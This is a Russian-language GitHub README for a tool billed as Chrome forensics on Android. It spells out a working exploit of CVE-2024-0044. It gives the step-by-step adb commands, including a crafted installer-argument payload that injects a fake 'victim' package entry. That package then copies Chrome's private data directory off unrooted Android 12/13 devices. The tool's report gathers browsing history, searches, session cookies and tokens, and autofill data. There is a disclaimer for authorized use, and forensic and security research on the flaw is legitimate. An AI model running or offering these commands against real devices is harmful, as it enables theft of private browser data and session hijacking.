
Надёжный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome на устройствах Android.
Мощный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome с устройств Android
Возможности • Установка • Использование • Документация
Автор: JackTekno
GitHub: github.com/JackTekno
Этот инструмент использует уязвимость CVE-2024-0044 (Run-as) для обхода ограничений прав доступа на нерутированных устройствах Android 12/13, что позволяет выполнять криминалистическое извлечение данных Google Chrome. Инструмент анализирует сырые базы данных SQLite и формирует комплексные отчёты.

Полный рабочий процесс криминалистического анализа от сбора данных до формирования отчета
Инструмент генерирует подробный отчёт в формате Excel (result_chrome_forensic.xlsx) со следующими листами:
F-Droid.apk)Клонировать репозиторий
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Установить зависимости
pip install -r requirements.txt
# Поместите фиктивный APK во временную папку
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Пример вывода: package:com.android.chrome uid:10129
# Запомните UID (например, 10129)
⚠️ Замените
10129на фактический UID Chrome из шага 3
adb shell
# Внутри оболочки ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Запустите менеджер пакетов
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Всё ещё внутри оболочки ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Выйти из оболочки ADB
exit
adb pull /data/local/tmp/chrome.tar .
Распакуйте файл 'chrome.tar' в папке проекта. Вручную перемещать файлы не нужно. Python-скрипт автоматически найдёт файлы баз данных внутри распакованных папок.
tar -xf chrome.tar
Запустите инструмент криминалистического анализа:
python3 chrome_forensic.py
Инструмент проанализирует файлы баз данных и создаст result_chrome_forensic.xlsx в той же директории.
⚠️ ВАЖНО: Этот инструмент предназначен только для образовательных целей и авторизованного криминалистического анализа.
- Используйте только на устройствах, которые вам принадлежат или на анализ которых вы имеете явное письменное разрешение.
- Несанкционированный доступ к цифровым устройствам может нарушать законы вашей юрисдикции.
- Авторы не несут ответственности за неправомерное использование данного инструмента.
Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.
Этот проект лицензирован под GNU General Public License v3.0. См. файл LICENSE для получения подробной информации.
Доказательство концепции метода сбора было обобщено и опубликовано Tinyhack.com.
Сделано с ❤️ от JackTekno
⭐ Поставить звезду • 🐛 Сообщить об ошибке • 💡 Запросить функцию
| Имя листа | Описание |
|---|
| 📖 История просмотров | Подробная временная шкала посещённых URL |
| 📈 Аналитика – Топ сайтов | Статистический рейтинг наиболее посещаемых доменов |
| ⚠️ ТРЕВОГИ – Подозрительные | Автоматически отмеченные URL (взлом, наркотики, контент для взрослых) |
| 📥 Загрузки | История загрузок с указанием путей и размеров файлов |
| 🔍 Поисковые запросы | Пользовательские поисковые запросы из omnibox/Google |
| 🍪 Куки и сессии | Токены сессий и метаданные куки (шестнадцатеричное шифрование) |
| ✍️ Данные автозаполнения | Сохранённые данные форм (имена, адреса и т.д.) |